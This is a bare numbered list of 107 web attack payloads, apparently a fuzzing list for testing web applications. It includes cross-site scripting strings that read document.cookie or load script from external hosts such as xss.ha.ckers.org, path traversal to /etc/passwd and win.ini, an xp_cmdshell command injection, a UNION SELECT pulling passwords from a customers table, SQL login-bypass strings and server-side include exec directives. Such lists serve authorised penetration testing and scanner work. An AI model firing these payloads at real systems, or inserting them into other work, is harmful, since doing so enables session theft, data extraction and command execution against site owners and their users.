1 '><script>alert(document.cookie)</script> 2 ='><script>alert(document.cookie)</script> 3 <script>alert(document.cookie)</script> 4 <script>alert(vulnerable)</script> 5 %3Cscript%3Ealert('XSS')%3C/script%3E 6 <script>alert('XSS')</script> 7 <img src="javascript:alert('XSS')"> 8 %0a%0a<script>alert("Vulnerable")</script>.jsp 9 %22%3cscript%3ealert(%22xss%22)%3c/script%3e 10 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 11 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini 12 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 13 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e 14 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html 15 %3f.jsp 16 %3f.jsp 17 <script>alert('Vulnerable');</script> 18 <script>alert('Vulnerable')</script> 19 ?sql_debug=1 20 a%5c.aspx 21 a.jsp/<script>alert('Vulnerable')</script> 22 a/ 23 a?<script>alert('Vulnerable')</script> 24 "><script>alert('Vulnerable')</script> 25 ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:inetpubwwwroot?.txt'--&& 26 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 27 %3Cscript%3Ealert(document. domain);%3C/script%3E& 28 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 29 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname= 30 http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd 31 ................windowssystem.ini 32 ................windowssystem.ini 33 '';!--"<XSS>=&{()} 34 <IMG src="javascript:alert('XSS');"> 35 <IMG src=javascript:alert('XSS')> 36 <IMG src=JaVaScRiPt:alert('XSS')> 37 <IMG src=JaVaScRiPt:alert("XSS")> 38 <IMG src=javascript:alert('XSS')> 39 <IMG src=javascript:alert('XSS')> 40 <IMG src=javascript:alert('XSS')> 41 <IMG src="jav ascript:alert('XSS');"> 42 <IMG src="jav ascript:alert('XSS');"> 43 <IMG src="jav ascript:alert('XSS');"> 44 "<IMG src=java�script:alert("XSS")>";' > out 45 <IMG src=" javascript:alert('XSS');"> 46 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 47 <BODY BACKGROUND="javascript:alert('XSS')"> 48 <BODY ONLOAD=alert('XSS')> 49 <IMG DYNSRC="javascript:alert('XSS')"> 50 <IMG LOWSRC="javascript:alert('XSS')"> 51 <BGSOUND src="javascript:alert('XSS');"> 52 <br size="&{alert('XSS')}"> 53 <LAYER src="http://xss.ha.ckers.org/a.js"></layer> 54 <LINK REL="stylesheet" href="javascript:alert('XSS');"> 55 <IMG src='vbscript:msgbox("XSS")'> 56 <IMG src="mocha:[code]"> 57 <IMG src="livescript:[code]"> 58 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 59 <IFRAME src=javascript:alert('XSS')></IFRAME> 60 <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET> 61 <TABLE BACKGROUND="javascript:alert('XSS')"> 62 <DIV STYLE="background-image: url(javascript:alert('XSS'))"> 63 <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');"> 64 <DIV STYLE=" expression(alert('XSS'));"> 65 <STYLE>@import'javasc ipt:alert("XSS")';</STYLE> 66 <IMG STYLE='xss:expression(alert("XSS"))'> 67 <STYLE TYPE="text/javascript">alert('XSS');</STYLE> 68 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A> 69 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 70 <BASE href="javascript:alert('XSS');//"> 71 getURL("javascript:alert('XSS')") 72 a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); 73 <XML src="javascript:alert('XSS');"> 74 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" 75 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT> 76 <IMG src="javascript:alert('XSS')" 77 <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"--> 78 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> 79 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 80 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 81 <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT> 82 <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT> 83 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT> 84 <A href=http://www.gohttp://www.google.com/ogle.com/>link</A> 85 admin'-- 86 ' or 0=0 -- 87 " or 0=0 -- 88 or 0=0 -- 89 ' or 0=0 # 90 " or 0=0 # 91 or 0=0 # 92 ' or 'x'='x 93 " or "x"="x 94 ') or ('x'='x 95 ' or 1=1-- 96 " or 1=1-- 97 or 1=1-- 98 ' or a=a-- 99 " or "a"="a 100 ') or ('a'='a 101 ") or ("a"="a 102 hi" or "a"="a 103 hi" or 1=1 -- 104 hi' or 1=1 -- 105 hi' or 'a'='a 106 hi') or ('a'='a 107 hi") or ("a"="a[/code]